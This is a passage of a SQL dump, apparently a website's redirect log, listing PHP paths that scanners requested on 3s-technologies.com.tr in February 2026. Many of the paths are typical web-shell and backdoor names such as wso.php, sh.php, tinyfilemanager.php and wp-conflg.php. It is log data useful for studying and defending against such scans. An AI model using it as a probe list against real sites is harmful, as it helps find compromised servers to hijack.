00:00:00',301),(58167,'http://www.3s-technologies.com.tr/tr/t00l.php',NULL,'','',2,0,'2026-02-24 07:35:21','0000-00-00 00:00:00',301),(58168,'http://www.3s-technologies.com.tr/tr/0x19493qu8zq.php',NULL,'','',1,0,'2026-02-24 07:35:30','0000-00-00 00:00:00',301),(58169,'http://www.3s-technologies.com.tr/tr/ws65.php',NULL,'','',1,0,'2026-02-24 07:35:30','0000-00-00 00:00:00',301),(58170,'http://www.3s-technologies.com.tr/tr/nzilpby53hv.php',NULL,'','',1,0,'2026-02-24 07:35:31','0000-00-00 00:00:00',301),(58171,'http://www.3s-technologies.com.tr/tr/wy2wogsbpzj.php',NULL,'','',1,0,'2026-02-24 07:35:31','0000-00-00 00:00:00',301),(58172,'http://www.3s-technologies.com.tr/tr/vkcrnlspuc2.php',NULL,'','',1,0,'2026-02-24 07:35:32','0000-00-00 00:00:00',301),(58173,'http://3s-technologies.com.tr/tr/rrb.php',NULL,'','',2,0,'2026-02-24 09:26:24','0000-00-00 00:00:00',301),(58174,'http://3s-technologies.com.tr/tr/jsonq.php',NULL,'','',2,0,'2026-02-24 09:26:26','0000-00-00 00:00:00',301),(58175,'http://3s-technologies.com.tr/tr/update/da222.php',NULL,'','',5,0,'2026-02-24 09:26:26','0000-00-00 00:00:00',301),(58176,'http://3s-technologies.com.tr/tr/wp-fast.php',NULL,'','',2,0,'2026-02-24 09:26:27','0000-00-00 00:00:00',301),(58177,'http://mail.3s-technologies.com.tr/tr/gaigu.php',NULL,'','',2,0,'2026-02-24 10:58:04','0000-00-00 00:00:00',301),(58178,'http://mail.3s-technologies.com.tr/tr/x12.php',NULL,'','',8,0,'2026-02-24 10:58:12','0000-00-00 00:00:00',301),(58179,'http://mail.3s-technologies.com.tr/tr/ad2.php',NULL,'','',4,0,'2026-02-24 10:58:14','0000-00-00 00:00:00',301),(58180,'http://mail.3s-technologies.com.tr/tr/sad8rd1.php',NULL,'','',3,0,'2026-02-24 10:58:15','0000-00-00 00:00:00',301),(58181,'http://mail.3s-technologies.com.tr/tr/a6s2.php',NULL,'','',2,0,'2026-02-24 10:58:17','0000-00-00 00:00:00',301),(58182,'http://mail.3s-technologies.com.tr/tr/wp-content/cc13.php?p=',NULL,'','',2,0,'2026-02-24 10:58:20','0000-00-00 00:00:00',301),(58183,'http://mail.3s-technologies.com.tr/tr/mon.php',NULL,'','',2,0,'2026-02-24 10:58:21','0000-00-00 00:00:00',301),(58184,'http://mail.3s-technologies.com.tr/tr/wp-includes/mah.php',NULL,'','',1,0,'2026-02-24 10:58:25','0000-00-00 00:00:00',301),(58185,'http://mail.3s-technologies.com.tr/tr/wp-includes/product.php',NULL,'','',1,0,'2026-02-24 10:58:26','0000-00-00 00:00:00',301),(58186,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/term.php',NULL,'','',1,0,'2026-02-24 10:58:32','0000-00-00 00:00:00',301),(58187,'http://mail.3s-technologies.com.tr/tr/rindex.php',NULL,'','',1,0,'2026-02-24 10:58:39','0000-00-00 00:00:00',301),(58188,'http://mail.3s-technologies.com.tr/tr/hplfuns.php',NULL,'','',31,0,'2026-02-24 10:58:40','0000-00-00 00:00:00',301),(58189,'http://mail.3s-technologies.com.tr/tr/wp-plugins.php',NULL,'','',1,0,'2026-02-24 10:58:41','0000-00-00 00:00:00',301),(58190,'http://mail.3s-technologies.com.tr/tr/wp-includes/widgets/include.php',NULL,'','',1,0,'2026-02-24 10:58:43','0000-00-00 00:00:00',301),(58191,'http://mail.3s-technologies.com.tr/tr/wp-includes/pomo/wp-login.php',NULL,'','',1,0,'2026-02-24 10:58:46','0000-00-00 00:00:00',301),(58192,'http://mail.3s-technologies.com.tr/tr/cgi-bin/upfile.php',NULL,'','',1,0,'2026-02-24 10:58:50','0000-00-00 00:00:00',301),(58193,'http://mail.3s-technologies.com.tr/tr/payment.php',NULL,'','',1,0,'2026-02-24 10:58:51','0000-00-00 00:00:00',301),(58194,'http://mail.3s-technologies.com.tr/tr/kill.php',NULL,'','',1,0,'2026-02-24 10:58:55','0000-00-00 00:00:00',301),(58195,'http://mail.3s-technologies.com.tr/tr/wp-includes/ixr/wp-login.php',NULL,'','',1,0,'2026-02-24 10:58:57','0000-00-00 00:00:00',301),(58196,'http://mail.3s-technologies.com.tr/tr/cgi-bin/lsd.php',NULL,'','',1,0,'2026-02-24 10:58:58','0000-00-00 00:00:00',301),(58197,'http://mail.3s-technologies.com.tr/tr/options-discussion.php',NULL,'','',1,0,'2026-02-24 10:59:06','0000-00-00 00:00:00',301),(58198,'http://mail.3s-technologies.com.tr/tr/wp-includes/images/about.php',NULL,'','',7,0,'2026-02-24 10:59:10','0000-00-00 00:00:00',301),(58199,'http://mail.3s-technologies.com.tr/tr/wp-includes/rest-api/index.php',NULL,'','',1,0,'2026-02-24 10:59:17','0000-00-00 00:00:00',301),(58200,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/about.php',NULL,'','',7,0,'2026-02-24 10:59:24','0000-00-00 00:00:00',301),(58201,'http://mail.3s-technologies.com.tr/tr/ynz.php7',NULL,'','',1,0,'2026-02-24 10:59:25','0000-00-00 00:00:00',301),(58202,'http://mail.3s-technologies.com.tr/tr/ws72.php',NULL,'','',1,0,'2026-02-24 10:59:26','0000-00-00 00:00:00',301),(58203,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/widgets-form-blocks.php',NULL,'','',1,0,'2026-02-24 10:59:27','0000-00-00 00:00:00',301),(58204,'http://mail.3s-technologies.com.tr/tr/options.php',NULL,'','',9,0,'2026-02-24 10:59:30','0000-00-00 00:00:00',301),(58205,'http://mail.3s-technologies.com.tr/tr/media-upload.php',NULL,'','',1,0,'2026-02-24 10:59:33','0000-00-00 00:00:00',301),(58206,'http://mail.3s-technologies.com.tr/tr/widgets.php',NULL,'','',3,0,'2026-02-24 10:59:39','0000-00-00 00:00:00',301),(58207,'http://mail.3s-technologies.com.tr/tr/freedoms.php',NULL,'','',3,0,'2026-02-24 10:59:41','0000-00-00 00:00:00',301),(58208,'http://mail.3s-technologies.com.tr/tr/database.php',NULL,'','',10,0,'2026-02-24 10:59:47','0000-00-00 00:00:00',301),(58209,'http://mail.3s-technologies.com.tr/tr/admin-header.php',NULL,'','',1,0,'2026-02-24 10:59:48','0000-00-00 00:00:00',301),(58210,'http://mail.3s-technologies.com.tr/tr/zeng.php',NULL,'','',1,0,'2026-02-24 10:59:52','0000-00-00 00:00:00',301),(58211,'http://mail.3s-technologies.com.tr/tr/checkbex.php',NULL,'','',1,0,'2026-02-24 10:59:54','0000-00-00 00:00:00',301),(58212,'http://mail.3s-technologies.com.tr/tr/my.php',NULL,'','',3,0,'2026-02-24 11:00:01','0000-00-00 00:00:00',301),(58213,'http://mail.3s-technologies.com.tr/tr/user-new.php',NULL,'','',1,0,'2026-02-24 11:00:04','0000-00-00 00:00:00',301),(58214,'http://3s-technologies.com.tr/tr/wc49.php',NULL,'','',4,0,'2026-02-24 16:57:25','0000-00-00 00:00:00',301),(58215,'http://3s-technologies.com.tr/tr/tl.php',NULL,'','',4,0,'2026-02-24 16:57:25','0000-00-00 00:00:00',301),(58216,'http://3s-technologies.com.tr/tr/x123x.php',NULL,'','',17,0,'2026-02-24 16:57:27','0000-00-00 00:00:00',301),(58217,'http://3s-technologies.com.tr/tr/wp-michan.php',NULL,'','',39,0,'2026-02-24 16:57:27','0000-00-00 00:00:00',301),(58218,'http://3s-technologies.com.tr/tr/nw2.php',NULL,'','',4,0,'2026-02-24 16:57:28','0000-00-00 00:00:00',301),(58219,'http://3s-technologies.com.tr/tr/blackmini.php',NULL,'','',4,0,'2026-02-24 16:57:28','0000-00-00 00:00:00',301),(58220,'http://3s-technologies.com.tr/tr/gssdd.php',NULL,'','',44,0,'2026-02-24 16:57:29','0000-00-00 00:00:00',301),(58221,'http://3s-technologies.com.tr/tr/f19.php',NULL,'','',5,0,'2026-02-24 16:57:29','0000-00-00 00:00:00',301),(58222,'http://3s-technologies.com.tr/tr/yussef.php',NULL,'','',7,0,'2026-02-24 16:57:32','0000-00-00 00:00:00',301),(58223,'http://3s-technologies.com.tr/tr/bdkr28wp.php',NULL,'','',66,0,'2026-02-24 16:57:33','0000-00-00 00:00:00',301),(58224,'http://3s-technologies.com.tr/tr/assets/css/dist',NULL,'','',2,0,'2026-02-24 16:57:59','0000-00-00 00:00:00',301),(58225,'http://3s-technologies.com.tr/tr/files/load.php',NULL,'','',2,0,'2026-02-24 16:58:02','0000-00-00 00:00:00',301),(58226,'http://3s-technologies.com.tr/tr/files/sh.php',NULL,'','',3,0,'2026-02-24 16:58:03','0000-00-00 00:00:00',301),(58227,'http://3s-technologies.com.tr/tr/files/start.php',NULL,'','',3,0,'2026-02-24 16:58:03','0000-00-00 00:00:00',301),(58228,'http://3s-technologies.com.tr/tr/files/xaw.php',NULL,'','',3,0,'2026-02-24 16:58:04','0000-00-00 00:00:00',301),(58229,'http://3s-technologies.com.tr/tr/wp-admin/js/fi.php',NULL,'','',43,0,'2026-02-24 16:58:04','0000-00-00 00:00:00',301),(58230,'http://mail.3s-technologies.com.tr/tr/myfile.php',NULL,'','',24,0,'2026-02-24 18:23:45','0000-00-00 00:00:00',301),(58231,'http://mail.3s-technologies.com.tr/tr/work.php',NULL,'','',3,0,'2026-02-24 18:23:45','0000-00-00 00:00:00',301),(58232,'http://mail.3s-technologies.com.tr/tr/pouhg.php',NULL,'','',7,0,'2026-02-24 18:23:48','0000-00-00 00:00:00',301),(58233,'http://mail.3s-technologies.com.tr/tr/vgtyu.php',NULL,'','',8,0,'2026-02-24 18:23:49','0000-00-00 00:00:00',301),(58234,'http://mail.3s-technologies.com.tr/tr/x123.php',NULL,'','',5,0,'2026-02-24 18:23:51','0000-00-00 00:00:00',301),(58235,'http://mail.3s-technologies.com.tr/tr/moshou.php',NULL,'','',9,0,'2026-02-24 18:23:52','0000-00-00 00:00:00',301),(58236,'http://mail.3s-technologies.com.tr/tr/seetox.php',NULL,'','',4,0,'2026-02-24 18:23:52','0000-00-00 00:00:00',301),(58237,'http://mail.3s-technologies.com.tr/tr/ws60.php',NULL,'','',16,0,'2026-02-24 18:23:53','0000-00-00 00:00:00',301),(58238,'http://mail.3s-technologies.com.tr/tr/samiri.php',NULL,'','',3,0,'2026-02-24 18:23:54','0000-00-00 00:00:00',301),(58239,'http://mail.3s-technologies.com.tr/tr/xoot.php',NULL,'','',6,0,'2026-02-24 18:23:55','0000-00-00 00:00:00',301),(58240,'http://mail.3s-technologies.com.tr/tr/file59.php',NULL,'','',27,0,'2026-02-24 18:23:57','0000-00-00 00:00:00',301),(58241,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/bolt.php',NULL,'','',41,0,'2026-02-24 18:23:57','0000-00-00 00:00:00',301),(58242,'http://mail.3s-technologies.com.tr/tr/shas.php',NULL,'','',3,0,'2026-02-24 18:23:58','0000-00-00 00:00:00',301),(58243,'http://mail.3s-technologies.com.tr/tr/xda.php',NULL,'','',16,0,'2026-02-24 18:23:59','0000-00-00 00:00:00',301),(58244,'http://mail.3s-technologies.com.tr/tr/er.php',NULL,'','',5,0,'2026-02-24 18:24:00','0000-00-00 00:00:00',301),(58245,'http://mail.3s-technologies.com.tr/tr/fault.php',NULL,'','',4,0,'2026-02-24 18:24:00','0000-00-00 00:00:00',301),(58246,'http://mail.3s-technologies.com.tr/tr/leuk.php',NULL,'','',4,0,'2026-02-24 18:24:02','0000-00-00 00:00:00',301),(58247,'http://mail.3s-technologies.com.tr/tr/xqq.php',NULL,'','',23,0,'2026-02-24 18:24:02','0000-00-00 00:00:00',301),(58248,'http://mail.3s-technologies.com.tr/tr/kolda.php',NULL,'','',5,0,'2026-02-24 18:24:03','0000-00-00 00:00:00',301),(58249,'http://mail.3s-technologies.com.tr/tr/god.php',NULL,'','',11,0,'2026-02-24 18:24:04','0000-00-00 00:00:00',301),(58250,'http://mail.3s-technologies.com.tr/tr/kj.php',NULL,'','',43,0,'2026-02-24 18:24:05','0000-00-00 00:00:00',301),(58251,'http://mail.3s-technologies.com.tr/tr/un.php',NULL,'','',8,0,'2026-02-24 18:24:06','0000-00-00 00:00:00',301),(58252,'http://mail.3s-technologies.com.tr/tr/login8.php',NULL,'','',3,0,'2026-02-24 18:24:08','0000-00-00 00:00:00',301),(58253,'http://mail.3s-technologies.com.tr/tr/bal.php',NULL,'','',28,0,'2026-02-25 10:12:38','0000-00-00 00:00:00',301),(58254,'http://mail.3s-technologies.com.tr/tr/bengi.php',NULL,'','',17,0,'2026-02-25 10:12:39','0000-00-00 00:00:00',301),(58255,'http://mail.3s-technologies.com.tr/tr/lb.php',NULL,'','',15,0,'2026-02-25 10:12:39','0000-00-00 00:00:00',301),(58256,'http://mail.3s-technologies.com.tr/tr/wp-includes/js/tinymce/themes/inlite',NULL,'','',15,0,'2026-02-25 10:12:51','0000-00-00 00:00:00',301),(58257,'http://mail.3s-technologies.com.tr/tr/wp-admin/js/pe9rsn.php',NULL,'','',2,0,'2026-02-25 10:12:52','0000-00-00 00:00:00',301),(58258,'http://mail.3s-technologies.com.tr/tr/special.php',NULL,'','',2,0,'2026-02-25 10:12:54','0000-00-00 00:00:00',301),(58259,'http://mail.3s-technologies.com.tr/tr/wp-includes/assets',NULL,'','',3,0,'2026-02-25 10:12:58','0000-00-00 00:00:00',301),(58260,'http://mail.3s-technologies.com.tr/tr/zsec.php',NULL,'','',2,0,'2026-02-25 10:13:04','0000-00-00 00:00:00',301),(58261,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/erinyani',NULL,'','',8,0,'2026-02-25 10:13:05','0000-00-00 00:00:00',301),(58262,'http://mail.3s-technologies.com.tr/tr/.wp/wso.php',NULL,'','',2,0,'2026-02-25 10:13:09','0000-00-00 00:00:00',301),(58263,'http://mail.3s-technologies.com.tr/tr/wp-includes/l10n',NULL,'','',20,0,'2026-02-25 10:13:11','0000-00-00 00:00:00',301),(58264,'http://mail.3s-technologies.com.tr/tr/new/index.php',NULL,'','',2,0,'2026-02-25 10:13:14','0000-00-00 00:00:00',301),(58265,'http://mail.3s-technologies.com.tr/tr/assets/css/dist',NULL,'','',2,0,'2026-02-25 10:13:15','0000-00-00 00:00:00',301),(58266,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/2021/02/index.php',NULL,'','',19,0,'2026-02-25 10:13:16','0000-00-00 00:00:00',301),(58267,'http://mail.3s-technologies.com.tr/tr/products/about.php',NULL,'','',2,0,'2026-02-25 10:13:16','0000-00-00 00:00:00',301),(58268,'http://mail.3s-technologies.com.tr/tr/wp-includes/js/jquery',NULL,'','',20,0,'2026-02-25 10:13:17','0000-00-00 00:00:00',301),(58269,'http://mail.3s-technologies.com.tr/tr/admin1.php',NULL,'','',7,0,'2026-02-25 10:13:19','0000-00-00 00:00:00',301),(58270,'http://mail.3s-technologies.com.tr/tr/files/load.php',NULL,'','',1,0,'2026-02-25 10:13:20','0000-00-00 00:00:00',301),(58271,'http://mail.3s-technologies.com.tr/tr/files/sh.php',NULL,'','',2,0,'2026-02-25 10:13:21','0000-00-00 00:00:00',301),(58272,'http://mail.3s-technologies.com.tr/tr/files/start.php',NULL,'','',2,0,'2026-02-25 10:13:22','0000-00-00 00:00:00',301),(58273,'http://mail.3s-technologies.com.tr/tr/files/xaw.php',NULL,'','',2,0,'2026-02-25 10:13:23','0000-00-00 00:00:00',301),(58274,'http://mail.3s-technologies.com.tr/tr/wp-admin/js/fi.php',NULL,'','',20,0,'2026-02-25 10:13:24','0000-00-00 00:00:00',301),(58275,'http://mail.3s-technologies.com.tr/tr/wc49.php',NULL,'','',4,0,'2026-02-25 10:13:24','0000-00-00 00:00:00',301),(58276,'http://mail.3s-technologies.com.tr/tr/tl.php',NULL,'','',4,0,'2026-02-25 10:13:25','0000-00-00 00:00:00',301),(58277,'http://mail.3s-technologies.com.tr/tr/x123x.php',NULL,'','',10,0,'2026-02-25 10:13:27','0000-00-00 00:00:00',301),(58278,'http://mail.3s-technologies.com.tr/tr/wp-michan.php',NULL,'','',17,0,'2026-02-25 10:13:28','0000-00-00 00:00:00',301),(58279,'http://mail.3s-technologies.com.tr/tr/nw2.php',NULL,'','',4,0,'2026-02-25 10:13:29','0000-00-00 00:00:00',301),(58280,'http://mail.3s-technologies.com.tr/tr/blackmini.php',NULL,'','',4,0,'2026-02-25 10:13:30','0000-00-00 00:00:00',301),(58281,'http://mail.3s-technologies.com.tr/tr/gssdd.php',NULL,'','',21,0,'2026-02-25 10:13:31','0000-00-00 00:00:00',301),(58282,'http://mail.3s-technologies.com.tr/tr/f19.php',NULL,'','',6,0,'2026-02-25 10:13:32','0000-00-00 00:00:00',301),(58283,'http://mail.3s-technologies.com.tr/tr/f1.php',NULL,'','',4,0,'2026-02-25 10:13:33','0000-00-00 00:00:00',301),(58284,'http://mail.3s-technologies.com.tr/tr/yussef.php',NULL,'','',6,0,'2026-02-25 10:13:37','0000-00-00 00:00:00',301),(58285,'http://mail.3s-technologies.com.tr/tr/bdkr28wp.php',NULL,'','',31,0,'2026-02-25 10:13:38','0000-00-00 00:00:00',301),(58286,'http://mail.3s-technologies.com.tr/tr/alpha.php',NULL,'','',22,0,'2026-02-25 10:13:39','0000-00-00 00:00:00',301),(58287,'http://www.3s-technologies.com.tr/tr/bal.php',NULL,'','',4,0,'2026-02-25 19:56:27','0000-00-00 00:00:00',301),(58288,'http://www.3s-technologies.com.tr/tr/bengi.php',NULL,'','',4,0,'2026-02-25 19:56:27','0000-00-00 00:00:00',301),(58289,'http://www.3s-technologies.com.tr/tr/lb.php',NULL,'','',3,0,'2026-02-25 19:56:28','0000-00-00 00:00:00',301),(58290,'http://www.3s-technologies.com.tr/tr/wp-admin/images/wp-conflg.php?p=',NULL,'','',1,0,'2026-02-25 19:56:28','0000-00-00 00:00:00',301),(58291,'http://www.3s-technologies.com.tr/tr/assets/css/index.php',NULL,'','',2,0,'2026-02-25 19:56:29','0000-00-00 00:00:00',301),(58292,'http://www.3s-technologies.com.tr/tr/wp-includes/css/dist',NULL,'','',4,0,'2026-02-25 19:56:32','0000-00-00 00:00:00',301),(58293,'http://www.3s-technologies.com.tr/tr/cgi-bin/index.php',NULL,'','',3,0,'2026-02-25 19:56:32','0000-00-00 00:00:00',301),(58294,'http://www.3s-technologies.com.tr/tr/wp-includes/js/tinymce/themes/inlite',NULL,'','',2,0,'2026-02-25 19:56:36','0000-00-00 00:00:00',301),(58295,'http://www.3s-technologies.com.tr/tr/wp-admin/js/pe9rsn.php',NULL,'','',1,0,'2026-02-25 19:56:37','0000-00-00 00:00:00',301),(58296,'http://www.3s-technologies.com.tr/tr/wp-content/themes/index.php',NULL,'','',7,0,'2026-02-25 19:56:38','0000-00-00 00:00:00',301),(58297,'http://www.3s-technologies.com.tr/tr/special.php',NULL,'','',1,0,'2026-02-25 19:56:38','0000-00-00 00:00:00',301),(58298,'http://www.3s-technologies.com.tr/tr/bak.php',NULL,'','',2,0,'2026-02-25 19:56:39','0000-00-00 00:00:00',301),(58299,'http://www.3s-technologies.com.tr/tr/wp-admin/js/widgets/index.php',NULL,'','',2,0,'2026-02-25 19:56:40','0000-00-00 00:00:00',301),(58300,'http://www.3s-technologies.com.tr/tr/wp-monamon.php',NULL,'','',1,0,'2026-02-25 19:56:42','0000-00-00 00:00:00',301),(58301,'http://www.3s-technologies.com.tr/tr/wp-includes/assets',NULL,'','',1,0,'2026-02-25 19:56:43','0000-00-00 00:00:00',301),(58302,'http://www.3s-technologies.com.tr/tr/wp-includes/sitemaps',NULL,'','',1,0,'2026-02-25 19:56:43','0000-00-00 00:00:00',301),(58303,'http://www.3s-technologies.com.tr/tr/zsec.php',NULL,'','',1,0,'2026-02-25 19:56:46','0000-00-00 00:00:00',301),(58304,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/erinyani',NULL,'','',1,0,'2026-02-25 19:56:47','0000-00-00 00:00:00',301),(58305,'http://www.3s-technologies.com.tr/tr/hi.php',NULL,'','',1,0,'2026-02-25 19:56:47','0000-00-00 00:00:00',301),(58306,'http://www.3s-technologies.com.tr/tr/.wp/wso.php',NULL,'','',1,0,'2026-02-25 19:56:49','0000-00-00 00:00:00',301),(58307,'http://www.3s-technologies.com.tr/tr/wp-includes/l10n',NULL,'','',4,0,'2026-02-25 19:56:50','0000-00-00 00:00:00',301),(58308,'http://www.3s-technologies.com.tr/tr/wp-includes/images/smilies/index.php',NULL,'','',2,0,'2026-02-25 19:56:51','0000-00-00 00:00:00',301),(58309,'http://www.3s-technologies.com.tr/tr/new/index.php',NULL,'','',1,0,'2026-02-25 19:56:52','0000-00-00 00:00:00',301),(58310,'http://www.3s-technologies.com.tr/tr/assets/css/dist',NULL,'','',1,0,'2026-02-25 19:56:52','0000-00-00 00:00:00',301),(58311,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/2021/02/index.php',NULL,'','',4,0,'2026-02-25 19:56:53','0000-00-00 00:00:00',301),(58312,'http://www.3s-technologies.com.tr/tr/products/about.php',NULL,'','',1,0,'2026-02-25 19:56:53','0000-00-00 00:00:00',301),(58313,'http://www.3s-technologies.com.tr/tr/wp-includes/js/jquery',NULL,'','',4,0,'2026-02-25 19:56:54','0000-00-00 00:00:00',301),(58314,'http://www.3s-technologies.com.tr/tr/page.php',NULL,'','',1,0,'2026-02-25 19:56:54','0000-00-00 00:00:00',301),(58315,'http://www.3s-technologies.com.tr/tr/admin1.php',NULL,'','',1,0,'2026-02-25 19:56:55','0000-00-00 00:00:00',301),(58316,'http://www.3s-technologies.com.tr/tr/files/load.php',NULL,'','',1,0,'2026-02-25 19:56:55','0000-00-00 00:00:00',301),(58317,'http://www.3s-technologies.com.tr/tr/files/sh.php',NULL,'','',2,0,'2026-02-25 19:56:57','0000-00-00 00:00:00',301),(58318,'http://www.3s-technologies.com.tr/tr/files/start.php',NULL,'','',2,0,'2026-02-25 19:56:57','0000-00-00 00:00:00',301),(58319,'http://www.3s-technologies.com.tr/tr/files/xaw.php',NULL,'','',2,0,'2026-02-25 19:56:58','0000-00-00 00:00:00',301),(58320,'http://www.3s-technologies.com.tr/tr/wp-admin/js/fi.php',NULL,'','',5,0,'2026-02-25 19:56:59','0000-00-00 00:00:00',301),(58321,'http://www.3s-technologies.com.tr/tr/wc49.php',NULL,'','',1,0,'2026-02-25 19:56:59','0000-00-00 00:00:00',301),(58322,'http://www.3s-technologies.com.tr/tr/tl.php',NULL,'','',1,0,'2026-02-25 19:57:00','0000-00-00 00:00:00',301),(58323,'http://www.3s-technologies.com.tr/tr/sys.php',NULL,'','',3,0,'2026-02-25 19:57:00','0000-00-00 00:00:00',301),(58324,'http://www.3s-technologies.com.tr/tr/fck.php',NULL,'','',1,0,'2026-02-25 19:57:01','0000-00-00 00:00:00',301),(58325,'http://www.3s-technologies.com.tr/tr/x123x.php',NULL,'','',1,0,'2026-02-25 19:57:01','0000-00-00 00:00:00',301),(58326,'http://www.3s-technologies.com.tr/tr/wp-michan.php',NULL,'','',4,0,'2026-02-25 19:57:02','0000-00-00 00:00:00',301),(58327,'http://www.3s-technologies.com.tr/tr/nw2.php',NULL,'','',1,0,'2026-02-25 19:57:02','0000-00-00 00:00:00',301),(58328,'http://www.3s-technologies.com.tr/tr/blackmini.php',NULL,'','',1,0,'2026-02-25 19:57:03','0000-00-00 00:00:00',301),(58329,'http://www.3s-technologies.com.tr/tr/gssdd.php',NULL,'','',4,0,'2026-02-25 19:57:03','0000-00-00 00:00:00',301),(58330,'http://www.3s-technologies.com.tr/tr/f19.php',NULL,'','',2,0,'2026-02-25 19:57:04','0000-00-00 00:00:00',301),(58331,'http://www.3s-technologies.com.tr/tr/f1.php',NULL,'','',1,0,'2026-02-25 19:57:04','0000-00-00 00:00:00',301),(58332,'http://www.3s-technologies.com.tr/tr/fff.php',NULL,'','',6,0,'2026-02-25 19:57:05','0000-00-00 00:00:00',301),(58333,'http://www.3s-technologies.com.tr/tr/yussef.php',NULL,'','',1,0,'2026-02-25 19:57:07','0000-00-00 00:00:00',301),(58334,'http://www.3s-technologies.com.tr/tr/bs1.php',NULL,'','',4,0,'2026-02-25 19:57:07','0000-00-00 00:00:00',301),(58335,'http://www.3s-technologies.com.tr/tr/bdkr28wp.php',NULL,'','',4,0,'2026-02-25 19:57:08','0000-00-00 00:00:00',301),(58336,'http://www.3s-technologies.com.tr/tr/alpha.php',NULL,'','',4,0,'2026-02-25 19:57:09','0000-00-00 00:00:00',301),(58337,'http://www.3s-technologies.com.tr/tr/opts.php',NULL,'','',3,0,'2026-02-25 19:57:10','0000-00-00 00:00:00',301),(58338,'http://www.3s-technologies.com.tr/tr/seetox.php',NULL,'','',2,0,'2026-02-25 19:57:12','0000-00-00 00:00:00',301),(58339,'http://www.3s-technologies.com.tr/tr/xoot.php',NULL,'','',1,0,'2026-02-25 19:57:13','0000-00-00 00:00:00',301),(58340,'http://www.3s-technologies.com.tr/tr/x57.php',NULL,'','',2,0,'2026-02-25 19:57:14','0000-00-00 00:00:00',301),(58341,'http://www.3s-technologies.com.tr/tr/file59.php',NULL,'','',3,0,'2026-02-25 19:57:14','0000-00-00 00:00:00',301),(58342,'http://www.3s-technologies.com.tr/tr/wp-admin/css/bolt.php',NULL,'','',11,0,'2026-02-25 19:57:15','0000-00-00 00:00:00',301),(58343,'http://www.3s-technologies.com.tr/tr/er.php',NULL,'','',2,0,'2026-02-25 19:57:16','0000-00-00 00:00:00',301),(58344,'http://www.3s-technologies.com.tr/tr/fault.php',NULL,'','',2,0,'2026-02-25 19:57:17','0000-00-00 00:00:00',301),(58345,'http://www.3s-technologies.com.tr/tr/leuk.php',NULL,'','',2,0,'2026-02-25 19:57:20','0000-00-00 00:00:00',301),(58346,'http://www.3s-technologies.com.tr/tr/xqq.php',NULL,'','',6,0,'2026-02-25 19:57:20','0000-00-00 00:00:00',301),(58347,'http://www.3s-technologies.com.tr/tr/kolda.php',NULL,'','',2,0,'2026-02-25 19:57:21','0000-00-00 00:00:00',301),(58348,'http://www.3s-technologies.com.tr/tr/nw.php',NULL,'','',8,0,'2026-02-25 19:57:21','0000-00-00 00:00:00',301),(58349,'http://www.3s-technologies.com.tr/tr/kj.php',NULL,'','',11,0,'2026-02-25 19:57:22','0000-00-00 00:00:00',301),(58350,'http://www.3s-technologies.com.tr/tr/un.php',NULL,'','',3,0,'2026-02-25 19:57:23','0000-00-00 00:00:00',301),(58351,'http://www.3s-technologies.com.tr/tr/cu.php',NULL,'','',7,0,'2026-02-25 19:57:25','0000-00-00 00:00:00',301),(58352,'http://www.3s-technologies.com.tr/tr/wp-access.php',NULL,'','',7,0,'2026-02-25 19:57:30','0000-00-00 00:00:00',301),(58353,'http://www.3s-technologies.com.tr/tr/a1vx.php',NULL,'','',3,0,'2026-02-25 19:57:31','0000-00-00 00:00:00',301),(58354,'http://www.3s-technologies.com.tr/tr/wp-the.php',NULL,'','',15,0,'2026-02-25 19:57:33','0000-00-00 00:00:00',301),(58355,'http://www.3s-technologies.com.tr/tr/fot.php',NULL,'','',2,0,'2026-02-25 19:57:36','0000-00-00 00:00:00',301),(58356,'http://www.3s-technologies.com.tr/tr/forbidals.php',NULL,'','',3,0,'2026-02-25 19:57:37','0000-00-00 00:00:00',301),(58357,'http://www.3s-technologies.com.tr/tr/dev1s.php',NULL,'','',2,0,'2026-02-25 19:57:38','0000-00-00 00:00:00',301),(58358,'http://www.3s-technologies.com.tr/tr/admiin.php',NULL,'','',1,0,'2026-02-25 19:57:40','0000-00-00 00:00:00',301),(58359,'http://www.3s-technologies.com.tr/tr/re.php',NULL,'','',1,0,'2026-02-25 19:57:42','0000-00-00 00:00:00',301),(58360,'http://www.3s-technologies.com.tr/tr/in.php',NULL,'','',4,0,'2026-02-25 19:57:45','0000-00-00 00:00:00',301),(58361,'http://www.3s-technologies.com.tr/tr/karak.php',NULL,'','',1,0,'2026-02-25 19:57:48','0000-00-00 00:00:00',301),(58362,'http://www.3s-technologies.com.tr/tr/prv8.php',NULL,'','',4,0,'2026-02-25 19:57:48','0000-00-00 00:00:00',301),(58363,'http://www.3s-technologies.com.tr/tr/ov.php',NULL,'','',1,0,'2026-02-25 19:57:56','0000-00-00 00:00:00',301),(58364,'http://www.3s-technologies.com.tr/tr/cbrfo.php',NULL,'','',1,0,'2026-02-25 19:58:04','0000-00-00 00:00:00',301),(58365,'http://www.3s-technologies.com.tr/tr/tinyfilemanager.php',NULL,'','',4,0,'2026-02-25 19:58:06','0000-00-00 00:00:00',301),(58366,'http://www.3s-technologies.com.tr/tr/fi.php',NULL,'','',5,0,'2026-02-25 19:58:08','0000-00-00 00:00:00',301),(58367,'http://www.3s-technologies.com.tr/tr/styll.php',NULL,'','',1,0,'2026-02-25 19:58:10','0000-00-00 00:00:00',301),(58368,'http://www.3s-technologies.com.tr/tr/thebe.php',NULL,'','',1,0,'2026-02-25 19:58:11','0000-00-00 00:00:00',301),(58369,'http://www.3s-technologies.com.tr/tr/ddd.php',NULL,'','',1,0,'2026-02-25 19:58:11','0000-00-00 00:00:00',301),(58370,'http://www.3s-technologies.com.tr/tr/xpwer1.php',NULL,'','',1,0,'2026-02-25 19:58:13','0000-00-00 00:00:00',301),(58371,'http://www.3s-technologies.com.tr/tr/wp-admin/images/commentv.php',NULL,'','',1,0,'2026-02-25 19:58:15','0000-00-00 00:00:00',301),(58372,'http://www.3s-technologies.com.tr/tr/wp-admin/images/wp-conflg.php',NULL,'','',2,0,'2026-02-25 19:58:16','0000-00-00 00:00:00',301),(58373,'http://www.3s-technologies.com.tr/tr/wp-includes/phpmailer',NULL,'','',2,0,'2026-02-25 19:58:20','0000-00-00 00:00:00',301),(58374,'http://www.3s-technologies.com.tr/tr/f5.php',NULL,'','',1,0,'2026-02-25 19:58:22','0000-00-00 